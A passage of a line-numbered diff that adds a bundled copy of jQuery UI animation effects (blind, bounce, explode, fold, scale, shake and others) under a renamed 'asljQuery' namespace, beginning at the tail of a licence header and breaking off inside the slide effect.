* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
|
4695 |
+
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
|
4696 |
+
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
|
4697 |
+
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
|
4698 |
+
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
|
4699 |
+
* OF THE POSSIBILITY OF SUCH DAMAGE.
|
4700 |
+
*
|
4701 |
+
*/
|
4702 |
+
|
4703 |
+
})(asljQuery);
|
4704 |
+
|
4705 |
+
(function( $, undefined ) {
|
4706 |
+
|
4707 |
+
$.effects.blind = function(o) {
|
4708 |
+
|
4709 |
+
return this.queue(function() {
|
4710 |
+
|
4711 |
+
// Create element
|
4712 |
+
var el = $(this), props = ['position','top','bottom','left','right'];
|
4713 |
+
|
4714 |
+
// Set options
|
4715 |
+
var mode = $.effects.setMode(el, o.options.mode || 'hide'); // Set Mode
|
4716 |
+
var direction = o.options.direction || 'vertical'; // Default direction
|
4717 |
+
|
4718 |
+
// Adjust
|
4719 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
4720 |
+
var wrapper = $.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
|
4721 |
+
var ref = (direction == 'vertical') ? 'height' : 'width';
|
4722 |
+
var distance = (direction == 'vertical') ? wrapper.height() : wrapper.width();
|
4723 |
+
if(mode == 'show') wrapper.css(ref, 0); // Shift
|
4724 |
+
|
4725 |
+
// Animation
|
4726 |
+
var animation = {};
|
4727 |
+
animation[ref] = mode == 'show' ? distance : 0;
|
4728 |
+
|
4729 |
+
// Animate
|
4730 |
+
wrapper.animate(animation, o.duration, o.options.easing, function() {
|
4731 |
+
if(mode == 'hide') el.hide(); // Hide
|
4732 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
4733 |
+
if(o.callback) o.callback.apply(el[0], arguments); // Callback
|
4734 |
+
el.dequeue();
|
4735 |
+
});
|
4736 |
+
|
4737 |
+
});
|
4738 |
+
|
4739 |
+
};
|
4740 |
+
|
4741 |
+
})(asljQuery);
|
4742 |
+
|
4743 |
+
(function( $, undefined ) {
|
4744 |
+
|
4745 |
+
$.effects.bounce = function(o) {
|
4746 |
+
|
4747 |
+
return this.queue(function() {
|
4748 |
+
|
4749 |
+
// Create element
|
4750 |
+
var el = $(this), props = ['position','top','bottom','left','right'];
|
4751 |
+
|
4752 |
+
// Set options
|
4753 |
+
var mode = $.effects.setMode(el, o.options.mode || 'effect'); // Set Mode
|
4754 |
+
var direction = o.options.direction || 'up'; // Default direction
|
4755 |
+
var distance = o.options.distance || 20; // Default distance
|
4756 |
+
var times = o.options.times || 5; // Default # of times
|
4757 |
+
var speed = o.duration || 250; // Default speed per bounce
|
4758 |
+
if (/show|hide/.test(mode)) props.push('opacity'); // Avoid touching opacity to prevent clearType and PNG issues in IE
|
4759 |
+
|
4760 |
+
// Adjust
|
4761 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
4762 |
+
$.effects.createWrapper(el); // Create Wrapper
|
4763 |
+
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
|
4764 |
+
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
|
4765 |
+
var distance = o.options.distance || (ref == 'top' ? el.outerHeight({margin:true}) / 3 : el.outerWidth({margin:true}) / 3);
|
4766 |
+
if (mode == 'show') el.css('opacity', 0).css(ref, motion == 'pos' ? -distance : distance); // Shift
|
4767 |
+
if (mode == 'hide') distance = distance / (times * 2);
|
4768 |
+
if (mode != 'hide') times--;
|
4769 |
+
|
4770 |
+
// Animate
|
4771 |
+
if (mode == 'show') { // Show Bounce
|
4772 |
+
var animation = {opacity: 1};
|
4773 |
+
animation[ref] = (motion == 'pos' ? '+=' : '-=') + distance;
|
4774 |
+
el.animate(animation, speed / 2, o.options.easing);
|
4775 |
+
distance = distance / 2;
|
4776 |
+
times--;
|
4777 |
+
};
|
4778 |
+
for (var i = 0; i < times; i++) { // Bounces
|
4779 |
+
var animation1 = {}, animation2 = {};
|
4780 |
+
animation1[ref] = (motion == 'pos' ? '-=' : '+=') + distance;
|
4781 |
+
animation2[ref] = (motion == 'pos' ? '+=' : '-=') + distance;
|
4782 |
+
el.animate(animation1, speed / 2, o.options.easing).animate(animation2, speed / 2, o.options.easing);
|
4783 |
+
distance = (mode == 'hide') ? distance * 2 : distance / 2;
|
4784 |
+
};
|
4785 |
+
if (mode == 'hide') { // Last Bounce
|
4786 |
+
var animation = {opacity: 0};
|
4787 |
+
animation[ref] = (motion == 'pos' ? '-=' : '+=') + distance;
|
4788 |
+
el.animate(animation, speed / 2, o.options.easing, function(){
|
4789 |
+
el.hide(); // Hide
|
4790 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
4791 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
4792 |
+
});
|
4793 |
+
} else {
|
4794 |
+
var animation1 = {}, animation2 = {};
|
4795 |
+
animation1[ref] = (motion == 'pos' ? '-=' : '+=') + distance;
|
4796 |
+
animation2[ref] = (motion == 'pos' ? '+=' : '-=') + distance;
|
4797 |
+
el.animate(animation1, speed / 2, o.options.easing).animate(animation2, speed / 2, o.options.easing, function(){
|
4798 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
4799 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
4800 |
+
});
|
4801 |
+
};
|
4802 |
+
el.queue('fx', function() { el.dequeue(); });
|
4803 |
+
el.dequeue();
|
4804 |
+
});
|
4805 |
+
|
4806 |
+
};
|
4807 |
+
|
4808 |
+
})(asljQuery);
|
4809 |
+
|
4810 |
+
(function( $, undefined ) {
|
4811 |
+
|
4812 |
+
$.effects.clip = function(o) {
|
4813 |
+
|
4814 |
+
return this.queue(function() {
|
4815 |
+
|
4816 |
+
// Create element
|
4817 |
+
var el = $(this), props = ['position','top','bottom','left','right','height','width'];
|
4818 |
+
|
4819 |
+
// Set options
|
4820 |
+
var mode = $.effects.setMode(el, o.options.mode || 'hide'); // Set Mode
|
4821 |
+
var direction = o.options.direction || 'vertical'; // Default direction
|
4822 |
+
|
4823 |
+
// Adjust
|
4824 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
4825 |
+
var wrapper = $.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
|
4826 |
+
var animate = el[0].tagName == 'IMG' ? wrapper : el;
|
4827 |
+
var ref = {
|
4828 |
+
size: (direction == 'vertical') ? 'height' : 'width',
|
4829 |
+
position: (direction == 'vertical') ? 'top' : 'left'
|
4830 |
+
};
|
4831 |
+
var distance = (direction == 'vertical') ? animate.height() : animate.width();
|
4832 |
+
if(mode == 'show') { animate.css(ref.size, 0); animate.css(ref.position, distance / 2); } // Shift
|
4833 |
+
|
4834 |
+
// Animation
|
4835 |
+
var animation = {};
|
4836 |
+
animation[ref.size] = mode == 'show' ? distance : 0;
|
4837 |
+
animation[ref.position] = mode == 'show' ? 0 : distance / 2;
|
4838 |
+
|
4839 |
+
// Animate
|
4840 |
+
animate.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
|
4841 |
+
if(mode == 'hide') el.hide(); // Hide
|
4842 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
4843 |
+
if(o.callback) o.callback.apply(el[0], arguments); // Callback
|
4844 |
+
el.dequeue();
|
4845 |
+
}});
|
4846 |
+
|
4847 |
+
});
|
4848 |
+
|
4849 |
+
};
|
4850 |
+
|
4851 |
+
})(asljQuery);
|
4852 |
+
|
4853 |
+
(function( $, undefined ) {
|
4854 |
+
|
4855 |
+
$.effects.drop = function(o) {
|
4856 |
+
|
4857 |
+
return this.queue(function() {
|
4858 |
+
|
4859 |
+
// Create element
|
4860 |
+
var el = $(this), props = ['position','top','bottom','left','right','opacity'];
|
4861 |
+
|
4862 |
+
// Set options
|
4863 |
+
var mode = $.effects.setMode(el, o.options.mode || 'hide'); // Set Mode
|
4864 |
+
var direction = o.options.direction || 'left'; // Default Direction
|
4865 |
+
|
4866 |
+
// Adjust
|
4867 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
4868 |
+
$.effects.createWrapper(el); // Create Wrapper
|
4869 |
+
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
|
4870 |
+
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
|
4871 |
+
var distance = o.options.distance || (ref == 'top' ? el.outerHeight({margin:true}) / 2 : el.outerWidth({margin:true}) / 2);
|
4872 |
+
if (mode == 'show') el.css('opacity', 0).css(ref, motion == 'pos' ? -distance : distance); // Shift
|
4873 |
+
|
4874 |
+
// Animation
|
4875 |
+
var animation = {opacity: mode == 'show' ? 1 : 0};
|
4876 |
+
animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance;
|
4877 |
+
|
4878 |
+
// Animate
|
4879 |
+
el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
|
4880 |
+
if(mode == 'hide') el.hide(); // Hide
|
4881 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
4882 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
4883 |
+
el.dequeue();
|
4884 |
+
}});
|
4885 |
+
|
4886 |
+
});
|
4887 |
+
|
4888 |
+
};
|
4889 |
+
|
4890 |
+
})(asljQuery);
|
4891 |
+
|
4892 |
+
(function( $, undefined ) {
|
4893 |
+
|
4894 |
+
$.effects.explode = function(o) {
|
4895 |
+
|
4896 |
+
return this.queue(function() {
|
4897 |
+
|
4898 |
+
var rows = o.options.pieces ? Math.round(Math.sqrt(o.options.pieces)) : 3;
|
4899 |
+
var cells = o.options.pieces ? Math.round(Math.sqrt(o.options.pieces)) : 3;
|
4900 |
+
|
4901 |
+
o.options.mode = o.options.mode == 'toggle' ? ($(this).is(':visible') ? 'hide' : 'show') : o.options.mode;
|
4902 |
+
var el = $(this).show().css('visibility', 'hidden');
|
4903 |
+
var offset = el.offset();
|
4904 |
+
|
4905 |
+
//Substract the margins - not fixing the problem yet.
|
4906 |
+
offset.top -= parseInt(el.css("marginTop"),10) || 0;
|
4907 |
+
offset.left -= parseInt(el.css("marginLeft"),10) || 0;
|
4908 |
+
|
4909 |
+
var width = el.outerWidth(true);
|
4910 |
+
var height = el.outerHeight(true);
|
4911 |
+
|
4912 |
+
for(var i=0;i<rows;i++) { // =
|
4913 |
+
for(var j=0;j<cells;j++) { // ||
|
4914 |
+
el
|
4915 |
+
.clone()
|
4916 |
+
.appendTo('body')
|
4917 |
+
.wrap('<div></div>')
|
4918 |
+
.css({
|
4919 |
+
position: 'absolute',
|
4920 |
+
visibility: 'visible',
|
4921 |
+
left: -j*(width/cells),
|
4922 |
+
top: -i*(height/rows)
|
4923 |
+
})
|
4924 |
+
.parent()
|
4925 |
+
.addClass('ui-effects-explode')
|
4926 |
+
.css({
|
4927 |
+
position: 'absolute',
|
4928 |
+
overflow: 'hidden',
|
4929 |
+
width: width/cells,
|
4930 |
+
height: height/rows,
|
4931 |
+
left: offset.left + j*(width/cells) + (o.options.mode == 'show' ? (j-Math.floor(cells/2))*(width/cells) : 0),
|
4932 |
+
top: offset.top + i*(height/rows) + (o.options.mode == 'show' ? (i-Math.floor(rows/2))*(height/rows) : 0),
|
4933 |
+
opacity: o.options.mode == 'show' ? 0 : 1
|
4934 |
+
}).animate({
|
4935 |
+
left: offset.left + j*(width/cells) + (o.options.mode == 'show' ? 0 : (j-Math.floor(cells/2))*(width/cells)),
|
4936 |
+
top: offset.top + i*(height/rows) + (o.options.mode == 'show' ? 0 : (i-Math.floor(rows/2))*(height/rows)),
|
4937 |
+
opacity: o.options.mode == 'show' ? 1 : 0
|
4938 |
+
}, o.duration || 500);
|
4939 |
+
}
|
4940 |
+
}
|
4941 |
+
|
4942 |
+
// Set a timeout, to call the callback approx. when the other animations have finished
|
4943 |
+
setTimeout(function() {
|
4944 |
+
|
4945 |
+
o.options.mode == 'show' ? el.css({ visibility: 'visible' }) : el.css({ visibility: 'visible' }).hide();
|
4946 |
+
if(o.callback) o.callback.apply(el[0]); // Callback
|
4947 |
+
el.dequeue();
|
4948 |
+
|
4949 |
+
$('div.ui-effects-explode').remove();
|
4950 |
+
|
4951 |
+
}, o.duration || 500);
|
4952 |
+
|
4953 |
+
|
4954 |
+
});
|
4955 |
+
|
4956 |
+
};
|
4957 |
+
|
4958 |
+
})(asljQuery);
|
4959 |
+
|
4960 |
+
(function( $, undefined ) {
|
4961 |
+
|
4962 |
+
$.effects.fade = function(o) {
|
4963 |
+
return this.queue(function() {
|
4964 |
+
var elem = $(this),
|
4965 |
+
mode = $.effects.setMode(elem, o.options.mode || 'hide');
|
4966 |
+
|
4967 |
+
elem.animate({ opacity: mode }, {
|
4968 |
+
queue: false,
|
4969 |
+
duration: o.duration,
|
4970 |
+
easing: o.options.easing,
|
4971 |
+
complete: function() {
|
4972 |
+
(o.callback && o.callback.apply(this, arguments));
|
4973 |
+
elem.dequeue();
|
4974 |
+
}
|
4975 |
+
});
|
4976 |
+
});
|
4977 |
+
};
|
4978 |
+
|
4979 |
+
})(asljQuery);
|
4980 |
+
|
4981 |
+
(function( $, undefined ) {
|
4982 |
+
|
4983 |
+
$.effects.fold = function(o) {
|
4984 |
+
|
4985 |
+
return this.queue(function() {
|
4986 |
+
|
4987 |
+
// Create element
|
4988 |
+
var el = $(this), props = ['position','top','bottom','left','right'];
|
4989 |
+
|
4990 |
+
// Set options
|
4991 |
+
var mode = $.effects.setMode(el, o.options.mode || 'hide'); // Set Mode
|
4992 |
+
var size = o.options.size || 15; // Default fold size
|
4993 |
+
var horizFirst = !(!o.options.horizFirst); // Ensure a boolean value
|
4994 |
+
var duration = o.duration ? o.duration / 2 : $.fx.speeds._default / 2;
|
4995 |
+
|
4996 |
+
// Adjust
|
4997 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
4998 |
+
var wrapper = $.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
|
4999 |
+
var widthFirst = ((mode == 'show') != horizFirst);
|
5000 |
+
var ref = widthFirst ? ['width', 'height'] : ['height', 'width'];
|
5001 |
+
var distance = widthFirst ? [wrapper.width(), wrapper.height()] : [wrapper.height(), wrapper.width()];
|
5002 |
+
var percent = /([0-9]+)%/.exec(size);
|
5003 |
+
if(percent) size = parseInt(percent[1],10) / 100 * distance[mode == 'hide' ? 0 : 1];
|
5004 |
+
if(mode == 'show') wrapper.css(horizFirst ? {height: 0, width: size} : {height: size, width: 0}); // Shift
|
5005 |
+
|
5006 |
+
// Animation
|
5007 |
+
var animation1 = {}, animation2 = {};
|
5008 |
+
animation1[ref[0]] = mode == 'show' ? distance[0] : size;
|
5009 |
+
animation2[ref[1]] = mode == 'show' ? distance[1] : 0;
|
5010 |
+
|
5011 |
+
// Animate
|
5012 |
+
wrapper.animate(animation1, duration, o.options.easing)
|
5013 |
+
.animate(animation2, duration, o.options.easing, function() {
|
5014 |
+
if(mode == 'hide') el.hide(); // Hide
|
5015 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
5016 |
+
if(o.callback) o.callback.apply(el[0], arguments); // Callback
|
5017 |
+
el.dequeue();
|
5018 |
+
});
|
5019 |
+
|
5020 |
+
});
|
5021 |
+
|
5022 |
+
};
|
5023 |
+
|
5024 |
+
})(asljQuery);
|
5025 |
+
|
5026 |
+
(function( $, undefined ) {
|
5027 |
+
|
5028 |
+
$.effects.highlight = function(o) {
|
5029 |
+
return this.queue(function() {
|
5030 |
+
var elem = $(this),
|
5031 |
+
props = ['backgroundImage', 'backgroundColor', 'opacity'],
|
5032 |
+
mode = $.effects.setMode(elem, o.options.mode || 'show'),
|
5033 |
+
animation = {
|
5034 |
+
backgroundColor: elem.css('backgroundColor')
|
5035 |
+
};
|
5036 |
+
|
5037 |
+
if (mode == 'hide') {
|
5038 |
+
animation.opacity = 0;
|
5039 |
+
}
|
5040 |
+
|
5041 |
+
$.effects.save(elem, props);
|
5042 |
+
elem
|
5043 |
+
.show()
|
5044 |
+
.css({
|
5045 |
+
backgroundImage: 'none',
|
5046 |
+
backgroundColor: o.options.color || '#ffff99'
|
5047 |
+
})
|
5048 |
+
.animate(animation, {
|
5049 |
+
queue: false,
|
5050 |
+
duration: o.duration,
|
5051 |
+
easing: o.options.easing,
|
5052 |
+
complete: function() {
|
5053 |
+
(mode == 'hide' && elem.hide());
|
5054 |
+
$.effects.restore(elem, props);
|
5055 |
+
(mode == 'show' && !$.support.opacity && this.style.removeAttribute('filter'));
|
5056 |
+
(o.callback && o.callback.apply(this, arguments));
|
5057 |
+
elem.dequeue();
|
5058 |
+
}
|
5059 |
+
});
|
5060 |
+
});
|
5061 |
+
};
|
5062 |
+
|
5063 |
+
})(asljQuery);
|
5064 |
+
|
5065 |
+
(function( $, undefined ) {
|
5066 |
+
|
5067 |
+
$.effects.pulsate = function(o) {
|
5068 |
+
return this.queue(function() {
|
5069 |
+
var elem = $(this),
|
5070 |
+
mode = $.effects.setMode(elem, o.options.mode || 'show'),
|
5071 |
+
times = ((o.options.times || 5) * 2) - 1,
|
5072 |
+
duration = o.duration ? o.duration / 2 : $.fx.speeds._default / 2,
|
5073 |
+
isVisible = elem.is(':visible'),
|
5074 |
+
animateTo = 0;
|
5075 |
+
|
5076 |
+
if (!isVisible) {
|
5077 |
+
elem.css('opacity', 0).show();
|
5078 |
+
animateTo = 1;
|
5079 |
+
}
|
5080 |
+
|
5081 |
+
if ((mode == 'hide' && isVisible) || (mode == 'show' && !isVisible)) {
|
5082 |
+
times--;
|
5083 |
+
}
|
5084 |
+
|
5085 |
+
for (var i = 0; i < times; i++) {
|
5086 |
+
elem.animate({ opacity: animateTo }, duration, o.options.easing);
|
5087 |
+
animateTo = (animateTo + 1) % 2;
|
5088 |
+
}
|
5089 |
+
|
5090 |
+
elem.animate({ opacity: animateTo }, duration, o.options.easing, function() {
|
5091 |
+
if (animateTo == 0) {
|
5092 |
+
elem.hide();
|
5093 |
+
}
|
5094 |
+
(o.callback && o.callback.apply(this, arguments));
|
5095 |
+
});
|
5096 |
+
|
5097 |
+
elem
|
5098 |
+
.queue('fx', function() { elem.dequeue(); })
|
5099 |
+
.dequeue();
|
5100 |
+
});
|
5101 |
+
};
|
5102 |
+
|
5103 |
+
})(asljQuery);
|
5104 |
+
|
5105 |
+
(function( $, undefined ) {
|
5106 |
+
|
5107 |
+
$.effects.puff = function(o) {
|
5108 |
+
return this.queue(function() {
|
5109 |
+
var elem = $(this),
|
5110 |
+
mode = $.effects.setMode(elem, o.options.mode || 'hide'),
|
5111 |
+
percent = parseInt(o.options.percent, 10) || 150,
|
5112 |
+
factor = percent / 100,
|
5113 |
+
original = { height: elem.height(), width: elem.width() };
|
5114 |
+
|
5115 |
+
$.extend(o.options, {
|
5116 |
+
fade: true,
|
5117 |
+
mode: mode,
|
5118 |
+
percent: mode == 'hide' ? percent : 100,
|
5119 |
+
from: mode == 'hide'
|
5120 |
+
? original
|
5121 |
+
: {
|
5122 |
+
height: original.height * factor,
|
5123 |
+
width: original.width * factor
|
5124 |
+
}
|
5125 |
+
});
|
5126 |
+
|
5127 |
+
elem.effect('scale', o.options, o.duration, o.callback);
|
5128 |
+
elem.dequeue();
|
5129 |
+
});
|
5130 |
+
};
|
5131 |
+
|
5132 |
+
$.effects.scale = function(o) {
|
5133 |
+
|
5134 |
+
return this.queue(function() {
|
5135 |
+
|
5136 |
+
// Create element
|
5137 |
+
var el = $(this);
|
5138 |
+
|
5139 |
+
// Set options
|
5140 |
+
var options = $.extend(true, {}, o.options);
|
5141 |
+
var mode = $.effects.setMode(el, o.options.mode || 'effect'); // Set Mode
|
5142 |
+
var percent = parseInt(o.options.percent,10) || (parseInt(o.options.percent,10) == 0 ? 0 : (mode == 'hide' ? 0 : 100)); // Set default scaling percent
|
5143 |
+
var direction = o.options.direction || 'both'; // Set default axis
|
5144 |
+
var origin = o.options.origin; // The origin of the scaling
|
5145 |
+
if (mode != 'effect') { // Set default origin and restore for show/hide
|
5146 |
+
options.origin = origin || ['middle','center'];
|
5147 |
+
options.restore = true;
|
5148 |
+
}
|
5149 |
+
var original = {height: el.height(), width: el.width()}; // Save original
|
5150 |
+
el.from = o.options.from || (mode == 'show' ? {height: 0, width: 0} : original); // Default from state
|
5151 |
+
|
5152 |
+
// Adjust
|
5153 |
+
var factor = { // Set scaling factor
|
5154 |
+
y: direction != 'horizontal' ? (percent / 100) : 1,
|
5155 |
+
x: direction != 'vertical' ? (percent / 100) : 1
|
5156 |
+
};
|
5157 |
+
el.to = {height: original.height * factor.y, width: original.width * factor.x}; // Set to state
|
5158 |
+
|
5159 |
+
if (o.options.fade) { // Fade option to support puff
|
5160 |
+
if (mode == 'show') {el.from.opacity = 0; el.to.opacity = 1;};
|
5161 |
+
if (mode == 'hide') {el.from.opacity = 1; el.to.opacity = 0;};
|
5162 |
+
};
|
5163 |
+
|
5164 |
+
// Animation
|
5165 |
+
options.from = el.from; options.to = el.to; options.mode = mode;
|
5166 |
+
|
5167 |
+
// Animate
|
5168 |
+
el.effect('size', options, o.duration, o.callback);
|
5169 |
+
el.dequeue();
|
5170 |
+
});
|
5171 |
+
|
5172 |
+
};
|
5173 |
+
|
5174 |
+
$.effects.size = function(o) {
|
5175 |
+
|
5176 |
+
return this.queue(function() {
|
5177 |
+
|
5178 |
+
// Create element
|
5179 |
+
var el = $(this), props = ['position','top','bottom','left','right','width','height','overflow','opacity'];
|
5180 |
+
var props1 = ['position','top','bottom','left','right','overflow','opacity']; // Always restore
|
5181 |
+
var props2 = ['width','height','overflow']; // Copy for children
|
5182 |
+
var cProps = ['fontSize'];
|
5183 |
+
var vProps = ['borderTopWidth', 'borderBottomWidth', 'paddingTop', 'paddingBottom'];
|
5184 |
+
var hProps = ['borderLeftWidth', 'borderRightWidth', 'paddingLeft', 'paddingRight'];
|
5185 |
+
|
5186 |
+
// Set options
|
5187 |
+
var mode = $.effects.setMode(el, o.options.mode || 'effect'); // Set Mode
|
5188 |
+
var restore = o.options.restore || false; // Default restore
|
5189 |
+
var scale = o.options.scale || 'both'; // Default scale mode
|
5190 |
+
var origin = o.options.origin; // The origin of the sizing
|
5191 |
+
var original = {height: el.height(), width: el.width()}; // Save original
|
5192 |
+
el.from = o.options.from || original; // Default from state
|
5193 |
+
el.to = o.options.to || original; // Default to state
|
5194 |
+
// Adjust
|
5195 |
+
if (origin) { // Calculate baseline shifts
|
5196 |
+
var baseline = $.effects.getBaseline(origin, original);
|
5197 |
+
el.from.top = (original.height - el.from.height) * baseline.y;
|
5198 |
+
el.from.left = (original.width - el.from.width) * baseline.x;
|
5199 |
+
el.to.top = (original.height - el.to.height) * baseline.y;
|
5200 |
+
el.to.left = (original.width - el.to.width) * baseline.x;
|
5201 |
+
};
|
5202 |
+
var factor = { // Set scaling factor
|
5203 |
+
from: {y: el.from.height / original.height, x: el.from.width / original.width},
|
5204 |
+
to: {y: el.to.height / original.height, x: el.to.width / original.width}
|
5205 |
+
};
|
5206 |
+
if (scale == 'box' || scale == 'both') { // Scale the css box
|
5207 |
+
if (factor.from.y != factor.to.y) { // Vertical props scaling
|
5208 |
+
props = props.concat(vProps);
|
5209 |
+
el.from = $.effects.setTransition(el, vProps, factor.from.y, el.from);
|
5210 |
+
el.to = $.effects.setTransition(el, vProps, factor.to.y, el.to);
|
5211 |
+
};
|
5212 |
+
if (factor.from.x != factor.to.x) { // Horizontal props scaling
|
5213 |
+
props = props.concat(hProps);
|
5214 |
+
el.from = $.effects.setTransition(el, hProps, factor.from.x, el.from);
|
5215 |
+
el.to = $.effects.setTransition(el, hProps, factor.to.x, el.to);
|
5216 |
+
};
|
5217 |
+
};
|
5218 |
+
if (scale == 'content' || scale == 'both') { // Scale the content
|
5219 |
+
if (factor.from.y != factor.to.y) { // Vertical props scaling
|
5220 |
+
props = props.concat(cProps);
|
5221 |
+
el.from = $.effects.setTransition(el, cProps, factor.from.y, el.from);
|
5222 |
+
el.to = $.effects.setTransition(el, cProps, factor.to.y, el.to);
|
5223 |
+
};
|
5224 |
+
};
|
5225 |
+
$.effects.save(el, restore ? props : props1); el.show(); // Save & Show
|
5226 |
+
$.effects.createWrapper(el); // Create Wrapper
|
5227 |
+
el.css('overflow','hidden').css(el.from); // Shift
|
5228 |
+
|
5229 |
+
// Animate
|
5230 |
+
if (scale == 'content' || scale == 'both') { // Scale the children
|
5231 |
+
vProps = vProps.concat(['marginTop','marginBottom']).concat(cProps); // Add margins/font-size
|
5232 |
+
hProps = hProps.concat(['marginLeft','marginRight']); // Add margins
|
5233 |
+
props2 = props.concat(vProps).concat(hProps); // Concat
|
5234 |
+
el.find("*[width]").each(function(){
|
5235 |
+
var child = $(this);
|
5236 |
+
if (restore) $.effects.save(child, props2);
|
5237 |
+
var c_original = {height: child.height(), width: child.width()}; // Save original
|
5238 |
+
child.from = {height: c_original.height * factor.from.y, width: c_original.width * factor.from.x};
|
5239 |
+
child.to = {height: c_original.height * factor.to.y, width: c_original.width * factor.to.x};
|
5240 |
+
if (factor.from.y != factor.to.y) { // Vertical props scaling
|
5241 |
+
child.from = $.effects.setTransition(child, vProps, factor.from.y, child.from);
|
5242 |
+
child.to = $.effects.setTransition(child, vProps, factor.to.y, child.to);
|
5243 |
+
};
|
5244 |
+
if (factor.from.x != factor.to.x) { // Horizontal props scaling
|
5245 |
+
child.from = $.effects.setTransition(child, hProps, factor.from.x, child.from);
|
5246 |
+
child.to = $.effects.setTransition(child, hProps, factor.to.x, child.to);
|
5247 |
+
};
|
5248 |
+
child.css(child.from); // Shift children
|
5249 |
+
child.animate(child.to, o.duration, o.options.easing, function(){
|
5250 |
+
if (restore) $.effects.restore(child, props2); // Restore children
|
5251 |
+
}); // Animate children
|
5252 |
+
});
|
5253 |
+
};
|
5254 |
+
|
5255 |
+
// Animate
|
5256 |
+
el.animate(el.to, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
|
5257 |
+
if (el.to.opacity === 0) {
|
5258 |
+
el.css('opacity', el.from.opacity);
|
5259 |
+
}
|
5260 |
+
if(mode == 'hide') el.hide(); // Hide
|
5261 |
+
$.effects.restore(el, restore ? props : props1); $.effects.removeWrapper(el); // Restore
|
5262 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
5263 |
+
el.dequeue();
|
5264 |
+
}});
|
5265 |
+
|
5266 |
+
});
|
5267 |
+
|
5268 |
+
};
|
5269 |
+
|
5270 |
+
})(asljQuery);
|
5271 |
+
|
5272 |
+
(function( $, undefined ) {
|
5273 |
+
|
5274 |
+
$.effects.shake = function(o) {
|
5275 |
+
|
5276 |
+
return this.queue(function() {
|
5277 |
+
|
5278 |
+
// Create element
|
5279 |
+
var el = $(this), props = ['position','top','bottom','left','right'];
|
5280 |
+
|
5281 |
+
// Set options
|
5282 |
+
var mode = $.effects.setMode(el, o.options.mode || 'effect'); // Set Mode
|
5283 |
+
var direction = o.options.direction || 'left'; // Default direction
|
5284 |
+
var distance = o.options.distance || 20; // Default distance
|
5285 |
+
var times = o.options.times || 3; // Default # of times
|
5286 |
+
var speed = o.duration || o.options.duration || 140; // Default speed per shake
|
5287 |
+
|
5288 |
+
// Adjust
|
5289 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
5290 |
+
$.effects.createWrapper(el); // Create Wrapper
|
5291 |
+
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
|
5292 |
+
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
|
5293 |
+
|
5294 |
+
// Animation
|
5295 |
+
var animation = {}, animation1 = {}, animation2 = {};
|
5296 |
+
animation[ref] = (motion == 'pos' ? '-=' : '+=') + distance;
|
5297 |
+
animation1[ref] = (motion == 'pos' ? '+=' : '-=') + distance * 2;
|
5298 |
+
animation2[ref] = (motion == 'pos' ? '-=' : '+=') + distance * 2;
|
5299 |
+
|
5300 |
+
// Animate
|
5301 |
+
el.animate(animation, speed, o.options.easing);
|
5302 |
+
for (var i = 1; i < times; i++) { // Shakes
|
5303 |
+
el.animate(animation1, speed, o.options.easing).animate(animation2, speed, o.options.easing);
|
5304 |
+
};
|
5305 |
+
el.animate(animation1, speed, o.options.easing).
|
5306 |
+
animate(animation, speed / 2, o.options.easing, function(){ // Last shake
|
5307 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
5308 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
5309 |
+
});
|
5310 |
+
el.queue('fx', function() { el.dequeue(); });
|
5311 |
+
el.dequeue();
|
5312 |
+
});
|
5313 |
+
|
5314 |
+
};
|
5315 |
+
|
5316 |
+
})(asljQuery);
|
5317 |
+
|
5318 |
+
(function( $, undefined ) {
|
5319 |
+
|
5320 |
+
$.effects.slide = function(o) {
|
5321 |
+
|
5322 |
+
return this.queue(function() {
|
5323 |
+
|
5324 |
+
// Create element
|
5325 |
+
var el = $(this), props = ['position','top','bottom','left','right'];
|
5326 |
+
|
5327 |
+
// Set options
|
5328 |
+
var mode = $.effects.setMode(el, o.options.mode || 'show'); // Set Mode
|
5329 |
+
var direction = o.options.direction || 'left'; // Default Direction
|
5330 |
+
|
5331 |
+
// Adjust
|
5332 |
+
$.effects.save(el, props); el.show(); // Save & Show
|
5333 |
+
